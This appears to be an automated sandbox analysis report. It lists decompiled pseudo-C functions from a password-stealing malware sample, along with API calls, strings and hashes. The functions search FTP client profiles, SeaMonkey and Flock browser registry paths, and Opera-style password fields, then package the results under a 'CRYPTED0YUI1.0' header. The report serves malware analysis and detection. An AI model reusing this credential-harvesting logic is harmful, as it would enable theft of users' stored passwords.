                                                                        				E00401803(_t24, 0x10);
                                                                        				_t11 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0);
                                                                        				 *_t24 = _t11;
                                                                        				_t12 = _t11 + 1;
                                                                        				if(_t12 != 0) {
                                                                        					_t24[3] = GetFileSize(_t12 - 1, 0);
                                                                        					_t18 = CreateFileMappingA( *_t24, 0, 2, 0, 0, 0);
                                                                        					if(_t18 == 0) {
                                                                        						CloseHandle( *_t24);
                                                                        						 *_t24 = 0xffffffff;
                                                                        					} else {
                                                                        						_t24[1] = _t18;
                                                                        						_t20 = MapViewOfFile(_t18, 4, 0, 0, 0);
                                                                        						_t24[2] = _t20;
                                                                        						if(_t20 == 0) {
                                                                        							CloseHandle(_t24[1]);
                                                                        							CloseHandle( *_t24);
                                                                        							 *_t24 = 0xffffffff;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return 0 | _t24[2] != 0x00000000;
                                                                        			}









                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401F3C
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401F4A
                                                                        • CreateFileMappingA.KERNEL32 ref: 00401F5E
                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003), ref: 00401F73
                                                                        • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000), ref: 00401F82
                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?), ref: 00401F89
                                                                        • CloseHandle.KERNEL32(?,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401F98
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$Create$MappingSizeView
                                                                        • String ID:
                                                                        • API String ID: 3733816638-0
                                                                        • Opcode ID: 59c95c0024b39b49a26cfa13d008d87d8e2c1c3143e065d0beb725acf6b20e2a
                                                                        • Instruction ID: a753e19abee84ff0306ed9f3ec9f6224fb0fe799db7add8b0a1e6242fd717f9b
                                                                        • Opcode Fuzzy Hash: 59c95c0024b39b49a26cfa13d008d87d8e2c1c3143e065d0beb725acf6b20e2a
                                                                        • Instruction Fuzzy Hash: D5117971680301BBEB312F75CC83F553A94BB01718F24C6667654BD1E6E6FC99908A5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408500(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				char* _v20;
                                                                        				char* _v24;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				void* _t80;
                                                                        				char* _t87;
                                                                        				void* _t101;
                                                                        				char* _t112;
                                                                        				char* _t137;
                                                                        				char* _t138;
                                                                        
                                                                        				_t136 = __edx;
                                                                        				_v16 = E0040106A(_t80, __edx, _a4);
                                                                        				if(_v16 >= 0x10) {
                                                                        					E00401273(_t81, __edx, _a4);
                                                                        					_v12 = 1;
                                                                        					_v8 = E00401304(__eflags, _a4,  &_v12);
                                                                        					__eflags = _v12;
                                                                        					if(_v12 == 0) {
                                                                        						L5:
                                                                        						return 1;
                                                                        					} else {
                                                                        						__eflags = _v8 - 2;
                                                                        						if(_v8 < 2) {
                                                                        							goto L5;
                                                                        						} else {
                                                                        							__eflags = _v8 - 6;
                                                                        							if(__eflags <= 0) {
                                                                        								_t87 = E00401304(__eflags, _a4,  &_v12);
                                                                        								__eflags = _v12;
                                                                        								if(_v12 == 0) {
                                                                        									L8:
                                                                        									return 1;
                                                                        								} else {
                                                                        									__eflags = _t87;
                                                                        									if(_t87 == 0) {
                                                                        										__eflags = _v8 - 5;
                                                                        										if(__eflags < 0) {
                                                                        											_v32 = E00401304(__eflags, _a4,  &_v12);
                                                                        											E00401388( &_v12, _a4, 4,  &_v12);
                                                                        										} else {
                                                                        											E00401388( &_v12, _a4, 0x18,  &_v12);
                                                                        											_v32 = E00401304(__eflags, _a4,  &_v12);
                                                                        										}
                                                                        										E0040809D(_a4,  &_v12);
                                                                        										__eflags = _v32 - 1;
                                                                        										if(__eflags == 0) {
                                                                        											E00408390(_t136, __eflags, _a4, _a8, _v8,  &_v12);
                                                                        											E0040809D(_a4,  &_v12);
                                                                        										}
                                                                        										__eflags = _v12;
                                                                        										if(__eflags != 0) {
                                                                        											E00408390(_t136, __eflags, _a4, _a8, _v8,  &_v12);
                                                                        											__eflags = _v12;
                                                                        											if(__eflags != 0) {
                                                                        												_t137 = E00401304(__eflags, _a4,  &_v12);
                                                                        												while(1) {
                                                                        													__eflags = _v12;
                                                                        													if(_v12 == 0) {
                                                                        														break;
                                                                        													}
                                                                        													_t138 = _t137;
                                                                        													__eflags = _t138;
                                                                        													if(_t138 != 0) {
                                                                        														_t101 = E0040143F(_a4);
                                                                        														__eflags = _t101 - _v16;
                                                                        														if(_t101 != _v16) {
                                                                        															__eflags = _v8 - 6;
                                                                        															if(__eflags >= 0) {
                                                                        																E00401304(__eflags, _a4,  &_v12);
                                                                        																E0040809D(_a4,  &_v12);
                                                                        																E0040809D(_a4,  &_v12);
                                                                        															}
                                                                        															_v20 = E0040824E(_t136, __eflags, _a4,  &_v12);
                                                                        															_v24 = E0040824E(_t136, __eflags, _a4,  &_v12);
                                                                        															_v28 = E0040824E(_t136, __eflags, _a4,  &_v12);
                                                                        															__eflags = _v20;
                                                                        															if(_v20 != 0) {
                                                                        																__eflags = _v24;
                                                                        																if(_v24 != 0) {
                                                                        																	__eflags = _v28;
                                                                        																	if(_v28 != 0) {
                                                                        																		__eflags = _v12;
                                                                        																		if(_v12 != 0) {
                                                                        																			_t112 = StrStrIA(_v20, "ftp://");
                                                                        																			__eflags = _t112;
                                                                        																			if(_t112 == 0) {
                                                                        																				_t112 = StrStrIA(_v20, "http://");
                                                                        																				__eflags = _t112;
                                                                        																				if(_t112 == 0) {
                                                                        																					_t112 = StrStrIA(_v20, "https://");
                                                                        																				}
                                                                        																			}
                                                                        																			__eflags = _t112;
                                                                        																			if(_t112 != 0) {
                                                                        																				E00401486(_a8, 0xbeef0000);
                                                                        																				E004014E8(_a8, _v20);
                                                                        																				E004014E8(_a8, _v24);
                                                                        																				E004014E8(_a8, _v28);
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        															E004017D5(_v20);
                                                                        															E004017D5(_v24);
                                                                        															E004017D5(_v28);
                                                                        															_t137 = _t138 - 1;
                                                                        															__eflags = _t137;
                                                                        															continue;
                                                                        														} else {
                                                                        														}
                                                                        													}
                                                                        													break;
                                                                        												}
                                                                        												return _v12;
                                                                        											} else {
                                                                        												return 0;
                                                                        											}
                                                                        										} else {
                                                                        											return 0;
                                                                        										}
                                                                        									} else {
                                                                        										goto L8;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								goto L5;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					return 1;
                                                                        				}
                                                                        			}

















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ftp://$http://$https://
                                                                        • API String ID: 0-2804853444
                                                                        • Opcode ID: a9de3c513cf4fe75db66f6004dda229fbde7a4a8d9b20780759a0ebf57d53af8
                                                                        • Instruction ID: fd2999549266695ab435609b8dc0b121c2d8f6895c951fe97b07cddbebe2be1e
                                                                        • Opcode Fuzzy Hash: a9de3c513cf4fe75db66f6004dda229fbde7a4a8d9b20780759a0ebf57d53af8
                                                                        • Instruction Fuzzy Hash: 3561F771800108FEDF11AF91CD41AEEBBB9EB04358F10847BF941B61A1DB398B95DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E0040E163(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				CHAR* _v28;
                                                                        				unsigned int _v32;
                                                                        				intOrPtr _v36;
                                                                        				void* _t35;
                                                                        				unsigned int _t38;
                                                                        				unsigned int _t42;
                                                                        				intOrPtr* _t45;
                                                                        				unsigned int _t47;
                                                                        				char* _t48;
                                                                        				unsigned int _t55;
                                                                        				unsigned int _t59;
                                                                        				char _t66;
                                                                        				char* _t67;
                                                                        
                                                                        				_t35 = E00401E53(_a8);
                                                                        				if(_t35 != 0) {
                                                                        					_t38 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t38;
                                                                        					if(_t38 != 0) {
                                                                        						_v24 = E004017EC(_v8);
                                                                        						E00401823(_v12, _v24, _v8);
                                                                        						_t67 = _v24;
                                                                        						while(1) {
                                                                        							__eflags =  *_t67;
                                                                        							if( *_t67 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t42 = StrStrA(_t67, "winex=\"");
                                                                        							__eflags = _t42;
                                                                        							if(_t42 != 0) {
                                                                        								_t67 = _t42 + lstrlenA("winex=\"");
                                                                        								_v28 = _t67;
                                                                        								_t45 = StrStrA(_t67, "\"/>");
                                                                        								__eflags = _t45;
                                                                        								if(_t45 != 0) {
                                                                        									 *_t45 = 0;
                                                                        									_push(_t45);
                                                                        									_push( *_t45);
                                                                        									_t47 = lstrlenA(_v28);
                                                                        									__eflags = _t47;
                                                                        									if(_t47 != 0) {
                                                                        										_v32 = _t47;
                                                                        										_v36 = E0040294B(_v28);
                                                                        										_t55 = E00402A3B(_v36, _v32);
                                                                        										__eflags = _t55;
                                                                        										if(_t55 != 0) {
                                                                        											_v32 = _v32 >> 1;
                                                                        											_t59 = E004041BC(_v36,  &_v32, 0);
                                                                        											__eflags = _t59;
                                                                        											if(_t59 != 0) {
                                                                        												E00401486(_a4, 0xbeef0001);
                                                                        												E004014E8(_a4, _v28);
                                                                        												E004014BC(_a4, _v36, _v32);
                                                                        											}
                                                                        										}
                                                                        										E004017D5(_v36);
                                                                        									}
                                                                        									_pop(_t66);
                                                                        									_pop(_t48);
                                                                        									 *_t48 = _t66;
                                                                        									continue;
                                                                        								}
                                                                        								break;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						E00401486(_a4, 0xbeef0002);
                                                                        						E004014BC(_a4, _v24, _v8);
                                                                        						E004017D5(_v24);
                                                                        						return E00401FB0( &_v20);
                                                                        					}
                                                                        					return _t38;
                                                                        				} else {
                                                                        					return _t35;
                                                                        				}
                                                                        			}





















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "/>$winex="
                                                                        • API String ID: 0-1498080979
                                                                        • Opcode ID: 9f9330b0a3a858bb5f104b66e8390021cddcbf3b8e479275484bd8ff3157b7fc
                                                                        • Instruction ID: 6ddc7879a2345c95c0110d8438dd60d4332b404bb8441acc01c28196f8b8e54f
                                                                        • Opcode Fuzzy Hash: 9f9330b0a3a858bb5f104b66e8390021cddcbf3b8e479275484bd8ff3157b7fc
                                                                        • Instruction Fuzzy Hash: 05315072D00109AACF126BA2CD02EEE7F75AF54344F14447BF510B51B1D73D8AA1ABA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00407F95(void* __ecx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t9;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        				char* _t20;
                                                                        
                                                                        				_v8 = E0040150D(_a4, 0x20, 0);
                                                                        				_t20 =  *0x414082; // 0x0
                                                                        				_t19 =  *0x414086; // 0x0
                                                                        				if( *_t19 != 0) {
                                                                        					do {
                                                                        						_push(StrStrIA(_t20, "FTPCON"));
                                                                        						_t9 = StrStrIA(_t19, "FTP CONTROL");
                                                                        						_pop(_t18);
                                                                        						if(_t9 != 0) {
                                                                        							L3:
                                                                        							E00404131(_a4, E00401D69(E0040234A(_t23, _t20), "\\Profiles"), ".prf", 0xbeef0000);
                                                                        							E004017D5(_t12);
                                                                        						} else {
                                                                        							_t18 = _t18;
                                                                        							_t23 = _t18;
                                                                        							if(_t18 != 0) {
                                                                        								goto L3;
                                                                        							}
                                                                        						}
                                                                        						while( *_t20 != 0) {
                                                                        							_t20 =  &(_t20[1]);
                                                                        							__eflags = _t20;
                                                                        						}
                                                                        						_t20 =  &(_t20[1]);
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						_t25 =  *_t19;
                                                                        					} while ( *_t19 != 0);
                                                                        				}
                                                                        				return E00401553(_t18, _t25, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,FTPCON), ref: 00407FC3
                                                                        • StrStrIA.SHLWAPI(00000000,FTP CONTROL,00000000,00000000,FTPCON), ref: 00407FCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                                                                        • API String ID: 0-2908215140
                                                                        • Opcode ID: 50a2e9bfdafcc93abbe3dd01e3f3dab718944d800bd44c445079ad6e10f4cdd6
                                                                        • Instruction ID: b7a8e328a3ee8981745373635da00d8c6f72f6bbf36a454012797349fecb33ea
                                                                        • Opcode Fuzzy Hash: 50a2e9bfdafcc93abbe3dd01e3f3dab718944d800bd44c445079ad6e10f4cdd6
                                                                        • Instruction Fuzzy Hash: 43012870A00605B9DB216772CD02FEF3E5B9BC4328F24443BF849B51E2EA7C5B81869C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00401944(void* __ecx, void* __edx, intOrPtr _a4, CHAR* _a8) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v280;
                                                                        				void* _t26;
                                                                        				signed int _t40;
                                                                        				signed int _t42;
                                                                        				void* _t44;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t44 = __ecx;
                                                                        				_t42 = 0;
                                                                        				_t26 =  &_v8;
                                                                        				_push(_t26);
                                                                        				_push(_a4);
                                                                        				L00410DBE();
                                                                        				if(_t26 >= 0) {
                                                                        					_v16 = E0040106A(_t26, __edx, _a4);
                                                                        					_t26 = GlobalLock(_v8);
                                                                        					_t47 = _t26;
                                                                        					if(_t26 != 0) {
                                                                        						_v20 = _t26;
                                                                        						_v12 = E004017EC(_v16);
                                                                        						E00401823(_v20, _v12, _v16);
                                                                        						GlobalUnlock(_v8);
                                                                        						E0040185C(_t44, _t47,  &_v280, _a8, lstrlenA(_a8));
                                                                        						E004012C7(E004018C7( &_v280, _v12, _v16), _t45, _a4);
                                                                        						_t40 = E0040149B(_a4, "CRYPTED0YUI1.0", 8);
                                                                        						_t42 = _t40 & E0040149B(_a4, _v12, _v16);
                                                                        						_t26 = E004017D5(_v12);
                                                                        					}
                                                                        				}
                                                                        				E0040125A(_t26, _t45, _a4);
                                                                        				return _t42;
                                                                        			}













                                                                        APIs
                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,0041053B,?,Oguqcogtkec,?,?,?,?,00000000,?,?), ref: 00401957
                                                                        • GlobalLock.KERNEL32 ref: 00401972
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GlobalUnlock.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,0041053B,?,Oguqcogtkec,?,?), ref: 0040199A
                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,00000000,00000000,?,?,?,?,?,?,0041053B,?,Oguqcogtkec,?), ref: 004019A2
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                                                        • String ID: CRYPTED0YUI1.0
                                                                        • API String ID: 4083238039-1217275205
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E004103AA(signed int __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				char* _v16;
                                                                        				void* _t28;
                                                                        				signed int _t32;
                                                                        
                                                                        				_t32 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_v16 = 0;
                                                                        				_t28 = 0;
                                                                        				_t17 =  &_v8;
                                                                        				_push(_t17);
                                                                        				_push(_a4);
                                                                        				L00410DBE();
                                                                        				if(_t17 >= 0) {
                                                                        					_v12 = E0040106A(_t17, _t32, _a4);
                                                                        					_v16 = E004017EC(_t23 + 1);
                                                                        					_t17 = GlobalLock(_v8);
                                                                        					if(GlobalLock(_v8) != 0) {
                                                                        						E00401823(_t17, _v16, _v12);
                                                                        						_t17 = GlobalUnlock(_v8);
                                                                        					}
                                                                        				}
                                                                        				E0040125A(_t17, _t32, _a4);
                                                                        				if(_v16 != 0) {
                                                                        					if(StrStrIA(_v16, "STATUS-IMPORT-OK") != 0) {
                                                                        						_t28 = 1;
                                                                        					}
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				return _t28;
                                                                        			}









                                                                        APIs
                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 004103C7
                                                                        • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?), ref: 0041041B
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GlobalLock.KERNEL32 ref: 004103E8
                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,?,?,00000001,?,?,?), ref: 00410400
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$AllocFromLocalLockStreamUnlock
                                                                        • String ID: STATUS-IMPORT-OK
                                                                        • API String ID: 1739492642-1591331578
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0040234A(void* __eflags, CHAR* _a4) {
                                                                        				int _t6;
                                                                        				char* _t8;
                                                                        				char* _t10;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = E00401D15(_a4, 0);
                                                                        				_t6 = lstrlenA(_a4);
                                                                        				if(_t6 > 1) {
                                                                        					_push(_t16);
                                                                        					if( *_t16 == 0x22) {
                                                                        						asm("cld");
                                                                        						_t3 =  &(_t16[1]); // 0x1
                                                                        						memcpy(_t16, _t3, _t6);
                                                                        					}
                                                                        					_pop(_t16);
                                                                        				}
                                                                        				_t8 = StrStrIA(_t16, ".exe");
                                                                        				if(_t8 != 0) {
                                                                        					 *((char*)(_t8 + 4)) = 0;
                                                                        				}
                                                                        				_t10 = StrRChrIA(_t16, 0, 0x5c);
                                                                        				if(_t10 == 0) {
                                                                        					 *_t16 = 0;
                                                                        				} else {
                                                                        					 *_t10 = 0;
                                                                        				}
                                                                        				if(lstrlenA(_t16) <= 3) {
                                                                        					 *_t16 = 0;
                                                                        				}
                                                                        				return _t16;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                        • StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                        • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                        • String ID: .exe
                                                                        • API String ID: 2414487701-4119554291
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409AD3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __eflags;
                                                                        				_t18 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x26, 0);
                                                                        				 *0x415824 = 0;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
                                                                        				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t18, _t19, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B01
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409B46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                                                        • API String ID: 3062143572-164276155
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409B5A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t19 = __eflags;
                                                                        				_t18 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x27, 0);
                                                                        				 *0x415824 = 0;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
                                                                        				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t18, _t19, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409B88
                                                                          • Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                          • Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                          • Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                          • Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BCD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                        • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                                                        • API String ID: 3062143572-1276807325
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E0040E69F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				CHAR* _v28;
                                                                        				unsigned int _v32;
                                                                        				intOrPtr _v36;
                                                                        				unsigned int _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				void* _t45;
                                                                        				char _t48;
                                                                        				char* _t50;
                                                                        				char* _t59;
                                                                        				char _t62;
                                                                        				char _t65;
                                                                        				char _t67;
                                                                        				char* _t68;
                                                                        				char _t70;
                                                                        				char _t75;
                                                                        				char _t83;
                                                                        				char* _t84;
                                                                        				char* _t85;
                                                                        				char* _t86;
                                                                        
                                                                        				_t45 = E00401E53(_a8);
                                                                        				if(_t45 != 0) {
                                                                        					"_OP3_Password2" = 0x50;
                                                                        					"_MTP_Password2" = 0x53;
                                                                        					_t48 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t48;
                                                                        					if(_t48 != 0) {
                                                                        						_push(_v8);
                                                                        						_pop( *_t5);
                                                                        						_v40 = _v40 >> 1;
                                                                        						_t50 = E0040296C(_v12, _v40);
                                                                        						__eflags = _t50;
                                                                        						if(_t50 == 0) {
                                                                        							_v24 = E004017EC(_v8);
                                                                        							E00401823(_v12, _v24, _v8);
                                                                        							_t85 = _v24;
                                                                        						} else {
                                                                        							_v24 = _t50;
                                                                        							_t85 = _t50;
                                                                        						}
                                                                        						while(1) {
                                                                        							_t86 = _t85;
                                                                        							__eflags = _t86;
                                                                        							if(_t86 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags =  *_t86;
                                                                        							if( *_t86 != 0) {
                                                                        								_t84 = "<_OP3_Password2";
                                                                        								while(1) {
                                                                        									_t59 = StrStrA(_t86, _t84);
                                                                        									__eflags = _t59;
                                                                        									if(_t59 != 0) {
                                                                        										break;
                                                                        									}
                                                                        									L10:
                                                                        									asm("cld");
                                                                        									asm("repne scasb");
                                                                        									__eflags =  *_t84;
                                                                        									if( *_t84 != 0) {
                                                                        										continue;
                                                                        									}
                                                                        									goto L24;
                                                                        								}
                                                                        								_t62 = StrStrIA(_t59, 0x416390);
                                                                        								__eflags = _t62;
                                                                        								if(_t62 != 0) {
                                                                        									_t85 = _t62 + 1;
                                                                        									_v28 = _t85;
                                                                        									_t65 = StrStrA(_t85, 0x416392);
                                                                        									__eflags = _t65;
                                                                        									if(_t65 != 0) {
                                                                        										 *_t65 = 0;
                                                                        										_push(_t65);
                                                                        										_push( *_t65);
                                                                        										_t67 = lstrlenA(_v28);
                                                                        										__eflags = _t67;
                                                                        										if(_t67 != 0) {
                                                                        											_v32 = _t67;
                                                                        											_v36 = E0040294B(_v28);
                                                                        											_t70 = E00402A3B(_v36, _v32);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												_v32 = _v32 >> 1;
                                                                        												 *_t26 =  *0x416388;
                                                                        												 *_t27 =  *0x41638c;
                                                                        												_t75 = E004041BC(_v36,  &_v32,  &_v48);
                                                                        												__eflags = _t75;
                                                                        												if(_t75 != 0) {
                                                                        													E00401486(_a4, 0xbeef0001);
                                                                        													E004014E8(_a4, _v28);
                                                                        													E004014BC(_a4, _v36, _v32);
                                                                        												}
                                                                        											}
                                                                        											E004017D5(_v36);
                                                                        										}
                                                                        										_pop(_t83);
                                                                        										_pop(_t68);
                                                                        										 *_t68 = _t83;
                                                                        										continue;
                                                                        									}
                                                                        								} else {
                                                                        								}
                                                                        							}
